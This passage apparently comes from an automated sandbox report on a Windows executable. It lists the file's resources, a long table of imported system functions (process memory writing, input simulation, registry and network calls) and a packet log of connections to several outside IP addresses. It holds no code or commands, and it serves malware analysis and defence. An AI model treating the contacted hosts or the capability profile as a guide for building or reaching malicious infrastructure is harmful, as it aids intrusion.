                                                                                                                                          RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                                                                                                          RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                                                                                                          RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                                                                                                          RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                                                                                                          RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                                                                                                          RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                                                                                                          RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                                                                                                          RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                                                                                                          RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                                                                                                                                          RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                                          RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                                          RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                                                                                                                                          RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                                                                                          RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                                                                                                                                          RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                                                                                                                                          RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                                                                                                                                          RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                                                                                                                                          RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                                                                                                                                          RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                                                                                                                                          Imports

                                                                                                                                          DLLImport
                                                                                                                                          WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                                                                                          VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                                                                                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                                          COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                                                                                          MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                                                                                          WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                                                                                          PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                                                                                          USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                                                                                          KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                                                                                                                          USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                                                                                                                          GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                                                                                                                          COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                                          ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                                                                                                                          SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                                          ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                                                                                                                          OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit

                                                                                                                                          Possible Origin

                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                          EnglishGreat Britain
                                                                                                                                          EnglishUnited States

                                                                                                                                          Network Behavior

                                                                                                                                          Network Port Distribution

                                                                                                                                          TCP Packets

                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Nov 14, 2024 16:28:02.751373053 CET4973680192.168.2.413.248.169.48
                                                                                                                                          Nov 14, 2024 16:28:02.756625891 CET804973613.248.169.48192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:02.756776094 CET4973680192.168.2.413.248.169.48
                                                                                                                                          Nov 14, 2024 16:28:02.765017986 CET4973680192.168.2.413.248.169.48
                                                                                                                                          Nov 14, 2024 16:28:02.770194054 CET804973613.248.169.48192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:03.423393011 CET804973613.248.169.48192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:03.445719004 CET804973613.248.169.48192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:03.445864916 CET4973680192.168.2.413.248.169.48
                                                                                                                                          Nov 14, 2024 16:28:03.450680971 CET4973680192.168.2.413.248.169.48
                                                                                                                                          Nov 14, 2024 16:28:03.455694914 CET804973613.248.169.48192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:18.513437986 CET4973780192.168.2.4142.250.185.211
                                                                                                                                          Nov 14, 2024 16:28:18.518631935 CET8049737142.250.185.211192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:18.518799067 CET4973780192.168.2.4142.250.185.211
                                                                                                                                          Nov 14, 2024 16:28:18.532887936 CET4973780192.168.2.4142.250.185.211
                                                                                                                                          Nov 14, 2024 16:28:18.538727045 CET8049737142.250.185.211192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:19.469888926 CET8049737142.250.185.211192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:19.522687912 CET4973780192.168.2.4142.250.185.211
                                                                                                                                          Nov 14, 2024 16:28:19.589544058 CET8049737142.250.185.211192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:19.589607000 CET4973780192.168.2.4142.250.185.211
                                                                                                                                          Nov 14, 2024 16:28:20.038564920 CET4973780192.168.2.4142.250.185.211
                                                                                                                                          Nov 14, 2024 16:28:21.056778908 CET4974080192.168.2.4142.250.185.211
                                                                                                                                          Nov 14, 2024 16:28:21.061836958 CET8049740142.250.185.211192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:21.065468073 CET4974080192.168.2.4142.250.185.211
                                                                                                                                          Nov 14, 2024 16:28:21.074604034 CET4974080192.168.2.4142.250.185.211
                                                                                                                                          Nov 14, 2024 16:28:21.079565048 CET8049740142.250.185.211192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:22.036875010 CET8049740142.250.185.211192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:22.085306883 CET4974080192.168.2.4142.250.185.211
                                                                                                                                          Nov 14, 2024 16:28:22.161900997 CET8049740142.250.185.211192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:22.161962986 CET4974080192.168.2.4142.250.185.211
                                                                                                                                          Nov 14, 2024 16:28:22.585701942 CET4974080192.168.2.4142.250.185.211
                                                                                                                                          Nov 14, 2024 16:28:23.603492975 CET4975680192.168.2.4142.250.185.211
                                                                                                                                          Nov 14, 2024 16:28:23.608594894 CET8049756142.250.185.211192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:23.609458923 CET4975680192.168.2.4142.250.185.211
                                                                                                                                          Nov 14, 2024 16:28:23.624396086 CET4975680192.168.2.4142.250.185.211
                                                                                                                                          Nov 14, 2024 16:28:23.629504919 CET8049756142.250.185.211192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:23.629523039 CET8049756142.250.185.211192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:23.629591942 CET8049756142.250.185.211192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:23.629606009 CET8049756142.250.185.211192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:23.629616976 CET8049756142.250.185.211192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:23.629642010 CET8049756142.250.185.211192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:23.629654884 CET8049756142.250.185.211192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:23.629667044 CET8049756142.250.185.211192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:23.629678965 CET8049756142.250.185.211192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:24.569091082 CET8049756142.250.185.211192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:24.616426945 CET4975680192.168.2.4142.250.185.211
                                                                                                                                          Nov 14, 2024 16:28:24.688858986 CET8049756142.250.185.211192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:24.688920975 CET4975680192.168.2.4142.250.185.211
                                                                                                                                          Nov 14, 2024 16:28:25.132247925 CET4975680192.168.2.4142.250.185.211
                                                                                                                                          Nov 14, 2024 16:28:26.151055098 CET4977280192.168.2.4142.250.185.211
                                                                                                                                          Nov 14, 2024 16:28:26.156101942 CET8049772142.250.185.211192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:26.156205893 CET4977280192.168.2.4142.250.185.211
                                                                                                                                          Nov 14, 2024 16:28:26.161971092 CET4977280192.168.2.4142.250.185.211
                                                                                                                                          Nov 14, 2024 16:28:26.167373896 CET8049772142.250.185.211192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:27.121997118 CET8049772142.250.185.211192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:27.163443089 CET4977280192.168.2.4142.250.185.211
                                                                                                                                          Nov 14, 2024 16:28:27.252998114 CET8049772142.250.185.211192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:27.253262997 CET4977280192.168.2.4142.250.185.211
                                                                                                                                          Nov 14, 2024 16:28:27.253762007 CET4977280192.168.2.4142.250.185.211
                                                                                                                                          Nov 14, 2024 16:28:27.258763075 CET8049772142.250.185.211192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:32.281150103 CET4980680192.168.2.469.57.163.227
                                                                                                                                          Nov 14, 2024 16:28:32.286128998 CET804980669.57.163.227192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:32.286200047 CET4980680192.168.2.469.57.163.227
                                                                                                                                          Nov 14, 2024 16:28:32.295607090 CET4980680192.168.2.469.57.163.227
                                                                                                                                          Nov 14, 2024 16:28:32.300472021 CET804980669.57.163.227192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:32.963535070 CET804980669.57.163.227192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:33.007141113 CET4980680192.168.2.469.57.163.227
                                                                                                                                          Nov 14, 2024 16:28:33.008586884 CET804980669.57.163.227192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:33.008657932 CET4980680192.168.2.469.57.163.227
                                                                                                                                          Nov 14, 2024 16:28:33.804096937 CET4980680192.168.2.469.57.163.227
                                                                                                                                          Nov 14, 2024 16:28:34.822777987 CET4981980192.168.2.469.57.163.227
                                                                                                                                          Nov 14, 2024 16:28:34.827822924 CET804981969.57.163.227192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:34.827930927 CET4981980192.168.2.469.57.163.227
                                                                                                                                          Nov 14, 2024 16:28:34.836637020 CET4981980192.168.2.469.57.163.227
                                                                                                                                          Nov 14, 2024 16:28:34.841768980 CET804981969.57.163.227192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:35.514314890 CET804981969.57.163.227192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:35.552625895 CET804981969.57.163.227192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:35.552691936 CET4981980192.168.2.469.57.163.227
                                                                                                                                          Nov 14, 2024 16:28:36.350893974 CET4981980192.168.2.469.57.163.227
                                                                                                                                          Nov 14, 2024 16:28:37.375847101 CET4983480192.168.2.469.57.163.227
                                                                                                                                          Nov 14, 2024 16:28:37.380810976 CET804983469.57.163.227192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:37.380909920 CET4983480192.168.2.469.57.163.227
                                                                                                                                          Nov 14, 2024 16:28:37.389938116 CET4983480192.168.2.469.57.163.227
                                                                                                                                          Nov 14, 2024 16:28:37.396184921 CET804983469.57.163.227192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:37.396218061 CET804983469.57.163.227192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:37.396245956 CET804983469.57.163.227192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:37.396785975 CET804983469.57.163.227192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:37.396814108 CET804983469.57.163.227192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:37.396862984 CET804983469.57.163.227192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:37.396891117 CET804983469.57.163.227192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:37.396939993 CET804983469.57.163.227192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:37.396966934 CET804983469.57.163.227192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:38.105174065 CET804983469.57.163.227192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:38.124193907 CET804983469.57.163.227192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:38.124392033 CET4983480192.168.2.469.57.163.227
                                                                                                                                          Nov 14, 2024 16:28:38.897784948 CET4983480192.168.2.469.57.163.227
                                                                                                                                          Nov 14, 2024 16:28:39.915982008 CET4984980192.168.2.469.57.163.227
                                                                                                                                          Nov 14, 2024 16:28:39.922159910 CET804984969.57.163.227192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:39.922313929 CET4984980192.168.2.469.57.163.227
                                                                                                                                          Nov 14, 2024 16:28:39.928170919 CET4984980192.168.2.469.57.163.227
                                                                                                                                          Nov 14, 2024 16:28:39.934236050 CET804984969.57.163.227192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:40.602739096 CET804984969.57.163.227192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:40.639923096 CET804984969.57.163.227192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:40.640136957 CET4984980192.168.2.469.57.163.227
                                                                                                                                          Nov 14, 2024 16:28:40.641315937 CET4984980192.168.2.469.57.163.227
                                                                                                                                          Nov 14, 2024 16:28:40.646178007 CET804984969.57.163.227192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:45.673346996 CET4988180192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:28:45.678253889 CET80498813.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:45.678344965 CET4988180192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:28:45.688035011 CET4988180192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:28:45.693023920 CET80498813.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:46.310935974 CET80498813.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:46.313479900 CET4988180192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:28:47.194709063 CET4988180192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:28:47.199856043 CET80498813.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:48.212836981 CET4989680192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:28:48.217972994 CET80498963.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:48.218118906 CET4989680192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:28:48.227636099 CET4989680192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:28:48.232506990 CET80498963.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:48.921617031 CET80498963.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:48.921709061 CET4989680192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:28:49.741427898 CET4989680192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:28:49.746403933 CET80498963.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:50.763597012 CET4991280192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:28:50.768903017 CET80499123.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:50.769049883 CET4991280192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:28:50.778182030 CET4991280192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:28:50.783404112 CET80499123.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:50.783436060 CET80499123.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:50.783463955 CET80499123.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:50.783490896 CET80499123.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:50.783552885 CET80499123.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:50.783580065 CET80499123.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:50.783607006 CET80499123.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:50.783632994 CET80499123.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:50.783659935 CET80499123.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:51.405498028 CET80499123.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:51.405627012 CET4991280192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:28:52.288331032 CET4991280192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:28:52.293133974 CET80499123.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:53.306482077 CET4992880192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:28:53.311788082 CET80499283.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:53.311960936 CET4992880192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:28:53.319679976 CET4992880192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:28:53.324640036 CET80499283.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:53.979857922 CET80499283.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:54.012082100 CET80499283.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:54.012223005 CET4992880192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:28:54.012929916 CET4992880192.168.2.43.33.130.190
                                                                                                                                          Nov 14, 2024 16:28:54.017884016 CET80499283.33.130.190192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:59.381650925 CET4996280192.168.2.4162.241.63.77
                                                                                                                                          Nov 14, 2024 16:28:59.387542009 CET8049962162.241.63.77192.168.2.4
                                                                                                                                          Nov 14, 2024 16:28:59.387624025 CET4996280192.168.2.4162.241.63.77
                                                                                                                                          Nov 14, 2024 16:28:59.402383089 CET4996280192.168.2.4162.241.63.77
                                                                                                                                          Nov 14, 2024 16:28:59.408170938 CET8049962162.241.63.77192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:00.913321972 CET4996280192.168.2.4162.241.63.77
                                                                                                                                          Nov 14, 2024 16:29:01.153918028 CET8049962162.241.63.77192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:01.153973103 CET8049962162.241.63.77192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:01.153995991 CET4996280192.168.2.4162.241.63.77
                                                                                                                                          Nov 14, 2024 16:29:01.154026985 CET4996280192.168.2.4162.241.63.77
                                                                                                                                          Nov 14, 2024 16:29:01.154249907 CET8049962162.241.63.77192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:01.154393911 CET4996280192.168.2.4162.241.63.77
                                                                                                                                          Nov 14, 2024 16:29:01.154696941 CET8049962162.241.63.77192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:01.154758930 CET4996280192.168.2.4162.241.63.77
                                                                                                                                          Nov 14, 2024 16:29:01.154864073 CET8049962162.241.63.77192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:01.154973984 CET4996280192.168.2.4162.241.63.77
                                                                                                                                          Nov 14, 2024 16:29:01.156209946 CET8049962162.241.63.77192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:01.156272888 CET4996280192.168.2.4162.241.63.77
                                                                                                                                          Nov 14, 2024 16:29:01.932554007 CET4997080192.168.2.4162.241.63.77
                                                                                                                                          Nov 14, 2024 16:29:01.937483072 CET8049970162.241.63.77192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:01.937551022 CET4997080192.168.2.4162.241.63.77
                                                                                                                                          Nov 14, 2024 16:29:01.948430061 CET4997080192.168.2.4162.241.63.77
                                                                                                                                          Nov 14, 2024 16:29:01.954713106 CET8049970162.241.63.77192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:03.459614038 CET8049970162.241.63.77192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:03.459641933 CET8049970162.241.63.77192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:03.459656000 CET8049970162.241.63.77192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:03.459736109 CET8049970162.241.63.77192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:03.459877014 CET8049970162.241.63.77192.168.2.4
                                                                                                                                          Nov 14, 2024 16:29:03.459918976 CET4997080192.168.2.4162.241.63.77
                                                                                                                                          Nov 14, 2024 16:29:03.459918976 CET4997080192.168.2.4162.241.63.77
                                                                                                                                          Nov 14, 2024 16:29:03.461206913 CET4997080192.168.2.4162.241.63.77
                                                                                                                                          Nov 14, 2024 16:29:03.461380959 CET4997080192.168.2.4162.241.63.77
